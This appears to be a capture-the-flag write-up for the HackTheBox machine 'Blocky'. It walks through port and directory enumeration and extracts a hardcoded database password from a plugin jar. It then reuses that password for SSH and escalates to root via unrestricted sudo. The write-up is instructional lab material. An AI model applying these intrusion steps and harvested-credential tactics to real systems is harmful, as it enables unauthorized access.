Content
Welcome to the Blocky writeup from HTB
tags:
Welcome to the Blocky writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Blocky
tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -p- -T4 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 19:38 CEST
Nmap scan report for 10.10.10.37
Host is up (0.10s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
8192/tcp closed sophos
25565/tcp open minecraft
Nmap done: 1 IP address (1 host up) scanned in 156.69 secondsNow that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 21,22,80,8192,25565 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 19:42 CEST
Nmap scan report for 10.10.10.37
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Device type: general purpose|WAP|specialized|storage-misc|broadband router|printer
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), Asus embedded (90%), Crestron 2-Series (89%), HP embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.12 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8192/tcp)
HOP RTT ADDRESS
1 101.83 ms 10.10.14.1
2 102.62 ms 10.10.10.37
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.84 secondsPort 80
Gobuster
$ gobuster dir -w /usr/share/wordlists/custom.txt -u http://10.10.10.37/ -x php -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.37/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/custom.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/05/10 19:47:27 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 290]
/.htaccess.php (Status: 403) [Size: 299]
/.htaccess (Status: 403) [Size: 295]
/.hta.php (Status: 403) [Size: 294]
/.htaccess (Status: 403) [Size: 295]
/.htaccess.php (Status: 403) [Size: 299]
/.htpasswd (Status: 403) [Size: 295]
/.htpasswd.php (Status: 403) [Size: 299]
/.htpasswd.php (Status: 403) [Size: 299]
/.htpasswd (Status: 403) [Size: 295]
/index.php (Status: 301) [Size: 0] [--> http://10.10.10.37/]
/index.php (Status: 301) [Size: 0] [--> http://10.10.10.37/]
/javascript (Status: 301) [Size: 315] [--> http://10.10.10.37/javascript/]
/javascript (Status: 301) [Size: 315] [--> http://10.10.10.37/javascript/]
/phpmyadmin (Status: 301) [Size: 315] [--> http://10.10.10.37/phpmyadmin/]
/phpmyadmin (Status: 301) [Size: 315] [--> http://10.10.10.37/phpmyadmin/]
/plugins (Status: 301) [Size: 312] [--> http://10.10.10.37/plugins/]
/server-status (Status: 403) [Size: 299]
/server-status (Status: 403) [Size: 299]
/wiki (Status: 301) [Size: 309] [--> http://10.10.10.37/wiki/]
/wp-admin (Status: 301) [Size: 313] [--> http://10.10.10.37/wp-admin/]
/wp-admin (Status: 301) [Size: 313] [--> http://10.10.10.37/wp-admin/]
/wp-content (Status: 301) [Size: 315] [--> http://10.10.10.37/wp-content/]
/wp-blog-header.php (Status: 200) [Size: 0]
/wp-cron.php (Status: 200) [Size: 0]
/wp-config.php (Status: 200) [Size: 0]
/wp-config.php (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 316] [--> http://10.10.10.37/wp-includes/]
/wp-load.php (Status: 200) [Size: 0]
/wp-mail.php (Status: 403) [Size: 3444]
/wp-links-opml.php (Status: 200) [Size: 219]
/wp-login.php (Status: 200) [Size: 2402]
/wp-login.php (Status: 200) [Size: 2402]
/wp-settings.php (Status: 500) [Size: 0]
/wp-signup.php (Status: 302) [Size: 0] [--> http://10.10.10.37/wp-login.php?action=register]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-trackback.php (Status: 200) [Size: 135]
/xmlrpc.php (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
2021/05/10 20:05:39 Finished
===============================================================Wpscan
$ wpscan --url http://10.10.10.37/ -e --plugins-detection aggressive
[...]
[i] No plugins Found.
[...]
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[...]Well, inside the directory plugins. We can find two files BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar. Let's download them and analyze them.
$ jar xf BlockyCore.jar
$ strings com/myfirstplugin/BlockyCore.class
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
localhost
root
8YsqfCTnvxAUeduzjNSXe22
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.javaMmmm interesat string... 8YsqfCTnvxAUeduzjNSXe22.
We have a user and this string ...Let me try...
SSH
First I tested with root because in blockycore.class they also mention the root user but it has not worked so we are going to use notch
$ ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
notch@Blocky:~$ cat user.txt
CENSORED_FLAG
notch@Blocky:~$And we are in!!
Post exploitation
Enumeration
Sudo
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALLReally? ok...
Privilege escalation
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# id
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:/home/notch# cd /root
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
CENSORED_FLAG
root@Blocky:~#Easy peasy 🤷♂️
Can you help me share it?
